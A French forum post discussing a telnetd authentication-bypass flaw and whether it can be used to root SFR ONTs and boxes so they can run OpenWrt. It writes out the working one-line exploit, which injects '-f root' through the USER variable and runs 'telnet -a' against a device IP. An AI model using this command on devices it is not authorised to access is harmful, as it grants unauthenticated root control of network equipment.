Salut a tous,
suite a la lecture de cette news :
https://korben.info/telnetd-faille-root-exploit.htmlcertains d'entre vous ont ils testé sur leur ONT externe SFR ? ou leur ONT SFP car il me semble que telnet est actif sur certains firmware. Je ne sais plus si la box NB6VAC n'a pas son telnet activé aussi ?!
En gros, le serveur telnetd passe la variable d'environnement USER directement à la commande login sans la nettoyer. Du coup, un attaquant n'a qu'à définir USER sur -f root
et utiliser telnet -a pour se retrouver connecté en root.
Donc si je comprends bien :
USER='-f root'
telnet -a 192.168.x.x
ici je vois qu'ils mettent tout sur la meme ligne :
https://medium.com/@shivam_bathla/telnetd-auth-bypass-to-root-f6e239d692b5USER="-f root" telnet -a IP_ADDRESS [PORT]Cette astuce va etre utile pour rooter certains routeurs et faciliter leur passage sous openwrt
Remplacer la box SFR par un routeur